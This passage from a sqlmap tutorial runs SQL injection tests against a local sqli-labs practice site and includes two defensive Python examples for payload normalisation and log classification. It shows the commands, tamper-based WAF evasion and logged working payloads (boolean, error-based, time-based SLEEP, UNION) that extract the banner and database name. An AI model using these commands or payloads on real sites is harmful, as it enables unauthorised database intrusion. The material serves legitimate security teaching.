[10:38:13] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
[10:38:13] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query - comment)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[10:38:13] [INFO] testing 'MySQL AND time-based blind (ELT)'
[10:38:13] [INFO] testing 'MySQL OR time-based blind (ELT)'
[10:38:13] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[10:38:13] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[10:38:13] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[10:38:14] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[10:38:14] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[10:38:14] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[10:38:14] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (heavy queries)'
[10:38:14] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[10:38:14] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[10:38:14] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[10:38:14] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[10:38:14] [INFO] testing 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (heavy query)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n]

[10:38:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:38:15] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[10:38:15] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[10:38:15] [WARNING] GET parameter 'id' does not seem to be injectable
[10:38:15] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. As heuristic test turned out positive you are strongly advised to continue on with the tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

[*] ending @ 10:38:15 /2020-03-01/


5. Sqlmap: setting tamper scripts

Apart from replacing strings between single quotes with a CHAR()-like representation, sqlmap itself does not obfuscate the payloads it sends.
sqlmap relies on tamper scripts to get past defences such as a WAF; all the tamper scripts shipped with sqlmap can be found in the tamper folder.
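Tamper scripts only change how a payload is written, not what it does, so the defensive counterpart is to normalise a request parameter before matching it. The following is an added Python example (not sqlmap's code and not from the original post): it undoes the `/**/`-for-space substitution that space2comment performs, the same idea as the removeComments/compressWhitespace transformations in ModSecurity, and shows a whitespace-based signature that misses the tampered form but fires after normalisation. The sample values are constructed from the payload shapes in the sqlmap output above, and the two rule regexes are illustrative, not production rules.

```python
"""Added example (not from the original post or from sqlmap): normalising a
request parameter before signature matching, so that a space2comment-style
tamper does not hide the payload from a WAF or log rule."""

import re
from typing import List
from urllib.parse import unquote_plus

# Constructed samples. The two 'plain_*' entries follow the payload shapes in
# sqlmap's output above; the two 'tamper_*' entries are the same payloads after
# a space2comment-style tamper has replaced every space with '/**/'.
SAMPLES = {
    "plain_bool": "1' AND 6118=6118 AND 'VaYg'='VaYg",
    "plain_union": "atUzqr' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b7171,0x6765,0x71706b7871)-- -",
    "tamper_bool": "1'/**/AND/**/6118=6118/**/AND/**/'VaYg'='VaYg",
    "tamper_union": "atUzqr'/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,CONCAT(0x71626b7171,0x6765,0x71706b7871)--/**/-",
}

# Illustrative signatures of the naive kind: keywords separated by whitespace.
RULES = {
    "union_select": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    # numeric tautology such as 'AND 6118=6118'; the backreference forces the
    # same number on both sides of '='
    "tautology": re.compile(r"\bAND\s+(\d+)=\1\b", re.I),
}

_INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)
_WHITESPACE = re.compile(r"\s+")


def normalize(value: str) -> str:
    """Bring a raw parameter value into a canonical form before matching:
    URL-decode it, turn every inline comment into a single space (space2comment
    relies on this step being absent), collapse whitespace runs and upper-case
    the result so keyword matching is case-insensitive."""
    value = unquote_plus(value)
    value = _INLINE_COMMENT.sub(" ", value)
    value = _WHITESPACE.sub(" ", value).strip()
    return value.upper()


def matching_rules(value: str, normalize_first: bool) -> List[str]:
    """Names of the rules that fire on the value, optionally after normalising it."""
    target = normalize(value) if normalize_first else value
    return [name for name, rx in RULES.items() if rx.search(target)]


if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:13} raw: {matching_rules(raw, False)}  normalised: {matching_rules(raw, True)}")
```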
When the payload position was customised above, sqlmap suggested the --tamper option; add it and test again:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -p id --prefix "')" --suffix " AND ('abc'='abc" --tamper=space2comment --banner

Output:

        ___
       __H__
 ___ ___["]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [']     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:46:09 /2020-03-01/

[10:46:09] [INFO] loading tamper module 'space2comment'
[10:46:09] [INFO] testing connection to the target URL
[10:46:09] [INFO] checking if the target is protected by some kind of WAF/IPS
[10:46:09] [INFO] testing if the target URL content is stable
[10:46:10] [INFO] target URL content is stable
[10:46:10] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[10:46:10] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[10:46:10] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

[10:46:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:46:12] [WARNING] reflective value(s) found and filtering out
[10:46:12] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[10:46:12] [INFO] testing 'Generic inline queries'
[10:46:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[10:46:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[10:46:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[10:46:12] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[10:46:12] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[10:46:12] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[10:46:12] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[10:46:13] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[10:46:13] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[10:46:13] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[10:46:13] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[10:46:13] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[10:46:13] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[10:46:13] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[10:46:13] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[10:46:14] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[10:46:14] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[10:46:14] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[10:46:14] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[10:46:14] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[10:46:14] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[10:46:14] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[10:46:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[10:46:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[10:46:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[10:46:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[10:46:14] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[10:46:14] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[10:46:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:46:14] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:46:14] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[10:46:14] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[10:46:14] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[10:46:14] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[10:46:14] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:46:14] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[10:46:14] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[10:46:14] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[10:46:14] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[10:46:14] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[10:46:14] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[10:46:14] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[10:46:14] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[10:46:14] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[10:46:14] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[10:46:14] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[10:46:14] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[10:46:14] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[10:46:14] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[10:46:14] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[10:46:14] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[10:46:14] [INFO] testing 'MySQL inline queries'
[10:46:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[10:46:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[10:46:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[10:46:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[10:46:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[10:46:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[10:46:14] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[10:46:15] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[10:46:15] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query)'
[10:46:15] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
[10:46:15] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query - comment)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[10:46:15] [INFO] testing 'MySQL AND time-based blind (ELT)'
[10:46:15] [INFO] testing 'MySQL OR time-based blind (ELT)'
[10:46:15] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[10:46:15] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[10:46:15] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[10:46:15] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[10:46:15] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (heavy queries)'
[10:46:15] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[10:46:15] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[10:46:15] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[10:46:15] [INFO] testing 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (heavy query)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n]

[10:46:16] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:46:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[10:46:16] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[10:46:16] [WARNING] GET parameter 'id' does not seem to be injectable
[10:46:16] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. As heuristic test turned out positive you are strongly advised to continue on with the tests

[*] ending @ 10:46:16 /2020-03-01/


6. sqlmap: setting DBMS credentials

DBMS credentials are passed with the following option:
--dbms-cred=username:password
This feature is of limited use: if you already know the database user name and password there is nothing left to probe, you can simply connect to the database directly.
Test:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-3/?id=1 --dbms-cred="root:root" --banner

Output:

        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:55:37 /2020-03-01/

[10:55:37] [INFO] testing connection to the target URL
[10:55:37] [INFO] checking if the target is protected by some kind of WAF/IPS
[10:55:37] [INFO] testing if the target URL content is stable
[10:55:38] [INFO] target URL content is stable
[10:55:38] [INFO] testing if GET parameter 'id' is dynamic
[10:55:38] [INFO] GET parameter 'id' appears to be dynamic
[10:55:38] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[10:55:38] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[10:55:38] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

[10:55:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:55:40] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[10:55:40] [INFO] testing 'Generic inline queries'
[10:55:40] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[10:55:40] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[10:55:40] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[10:55:40] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[10:55:40] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[10:55:40] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[10:55:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:55:40] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[10:55:40] [INFO] testing 'MySQL inline queries'
[10:55:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[10:55:40] [WARNING] time-based comparison requires larger statistical model, please wait......... (done)
[10:55:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[10:55:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[10:55:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[10:55:40] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[10:55:40] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[10:55:40] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:55:50] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[10:55:50] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[10:55:50] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[10:55:50] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[10:55:50] [INFO] target URL appears to have 3 columns in query
[10:55:50] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1') AND 9058=9058 AND ('dhTu'='dhTu

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1') AND (SELECT 6167 FROM(SELECT COUNT(*),CONCAT(0x716a716a71,(SELECT (ELT(6167=6167,1))),0x716b6a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('ETjb'='ETjb

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1') AND (SELECT 4161 FROM (SELECT(SLEEP(5)))PeGx) AND ('WPLo'='WPLo

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-2145') UNION ALL SELECT NULL,NULL,CONCAT(0x716a716a71,0x5758644165596a476969716e597763436e4c506652536466735754476a73534a6a6b7776486c6f45,0x716b6a6b71)-- -
---
[10:55:56] [INFO] the back-end DBMS is MySQL
[10:55:56] [INFO] fetching banner
[10:55:56] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[10:55:56] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'

[*] ending @ 10:55:56 /2020-03-01/


V. sqlmap injection technique options

1. sqlmap: choosing specific SQL injection techniques

Option:
--technique
This option selects the techniques sqlmap uses when testing for injection; by default sqlmap tries every technique it supports.
The option takes uppercase letters naming the techniques, B, E, U, S, T or Q, with the following meanings:

  • B: Boolean-based blind
  • E: Error-based
  • U: UNION query-based
  • S: Stacked queries
  • T: Time-based blind
  • Q: Inline queries

Examples:
--technique ES selects two detection techniques;
--technique BEUSTQ is equivalent to the default.
Boolean-based blind test:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-3/?id=1 --technique B --current-db

Output:

        ___
       __H__
 ___ ___[']_____ ___ ___  {1.4.2.31#dev}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 11:01:28 /2020-03-01/

[11:01:28] [INFO] testing connection to the target URL
[11:01:29] [INFO] checking if the target is protected by some kind of WAF/IPS
[11:01:29] [INFO] testing if the target URL content is stable
[11:01:29] [INFO] target URL content is stable
[11:01:29] [INFO] testing if GET parameter 'id' is dynamic
[11:01:29] [INFO] GET parameter 'id' appears to be dynamic
[11:01:29] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[11:01:29] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[11:01:29] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

[11:01:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:01:35] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[11:01:35] [INFO] checking if the injection point on GET parameter 'id' is a false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 17 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1') AND 7837=7837 AND ('Inoj'='Inoj
---
[11:01:38] [INFO] testing MySQL
[11:01:38] [INFO] confirming MySQL
[11:01:38] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[11:01:38] [INFO] fetching current database
[11:01:38] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[11:01:38] [INFO] retrieved: security
current database: 'security'
[11:01:39] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'

[*] ending @ 11:01:39 /2020-03-01/


Clearly, only the boolean-based blind type is reported this time.
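To see what the technique letters correspond to on the receiving side, here is an added example (not code from the original post or from sqlmap) that URL-decodes the `id` parameter out of constructed access-log lines and labels each request with the `--technique` letter(s) whose payload shape it matches. The B, E, U and T shapes are the ones sqlmap printed in the runs above (AND n=n, FLOOR(RAND(0)*2), UNION ALL SELECT, SLEEP(n)); the S and Q patterns, the log format and the `access_line`, `classify` and `scan_log` helper names are assumptions made for this example.

```python
import re
from urllib.parse import parse_qsl, quote, urlsplit

# Distinctive tokens of each payload family, keyed by sqlmap's --technique
# letter.  B, E, U and T follow the payload shapes printed in the runs above;
# the S and Q shapes are assumptions for this example.
TECHNIQUE_PATTERNS = [
    ("B", re.compile(r"\b(AND|OR)\s+(\d+)\s*=\s*\2\b", re.I)),            # boolean-based blind
    ("E", re.compile(r"FLOOR\s*\(\s*RAND\s*\(|EXTRACTVALUE\s*\(|"
                     r"UPDATEXML\s*\(|JSON_KEYS\s*\(", re.I)),              # error-based
    ("U", re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),                # UNION query
    ("S", re.compile(r";\s*(SELECT|INSERT|UPDATE|DELETE|DROP)\b", re.I)),   # stacked queries (assumed shape)
    ("T", re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I)),                   # time-based blind
    ("Q", re.compile(r"\(\s*SELECT\s+CONCAT\s*\(", re.I)),                  # inline queries (assumed shape)
]

# Request part of a combined-log-format line: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def classify(value):
    """Return the --technique letters (in sqlmap's BEUSTQ order) whose pattern
    appears in one decoded parameter value; '' means nothing matched."""
    found = {letter for letter, rx in TECHNIQUE_PATTERNS if rx.search(value)}
    return "".join(letter for letter in "BEUSTQ" if letter in found)


def scan_log(lines):
    """Return (line_no, parameter, letters) for every request whose query
    string carries a parameter value matching at least one technique pattern."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            letters = classify(value)
            if letters:
                hits.append((line_no, name, letters))
    return hits


def access_line(id_value, ts="01/Mar/2020:11:07:06 +0800"):
    """Build a constructed access-log line for GET /sqli-labs/Less-3/?id=<value>,
    URL-encoding the value the way a client would send it."""
    return (f'127.0.0.1 - - [{ts}] "GET /sqli-labs/Less-3/?id={quote(id_value, safe="")} '
            f'HTTP/1.1" 200 745 "-" "-"')


# Constructed sample log: a benign request, then the payload shapes seen in
# this post's output, then one assumed stacked-query shape.
SAMPLE_LOG = [access_line(v) for v in [
    "1",
    "1') AND 7837=7837 AND ('Inoj'='Inoj",
    "1') AND (SELECT 4928 FROM(SELECT COUNT(*),CONCAT(0x71707a6b71,(SELECT (ELT(4928=4928,1))),"
    "0x716a6a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('LiLq'='LiLq",
    "1') AND (SELECT 9581 FROM (SELECT(SLEEP(3)))pIsh) AND ('YbSn'='YbSn",
    "-2335') UNION ALL SELECT NULL,NULL,CONCAT(0x71707a6b71,0x6f74,0x716a6a7071)-- -",
    "1');SELECT SLEEP(5)#",
]]

if __name__ == "__main__":
    for line_no, name, letters in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: parameter {name!r} matches technique(s) {letters}")
```

A request can match more than one letter (the stacked sample yields "ST" because it also contains SLEEP), which mirrors how sqlmap reports several types for one parameter; the benign `id=1` request produces no hit at all.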

2. sqlmap: setting the time-based blind delay

Option:
--time-sec
This option sets the delay, in seconds, used by time-based blind injection; the default is 5 seconds.

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-3/?id=1 --current-db --time-sec 3

Output:

        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 11:06:57 /2020-03-01/

[11:06:57] [INFO] testing connection to the target URL
[11:06:57] [INFO] checking if the target is protected by some kind of WAF/IPS
[11:06:57] [INFO] testing if the target URL content is stable
[11:06:58] [INFO] target URL content is stable
[11:06:58] [INFO] testing if GET parameter 'id' is dynamic
[11:06:58] [INFO] GET parameter 'id' appears to be dynamic
[11:06:58] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[11:06:58] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
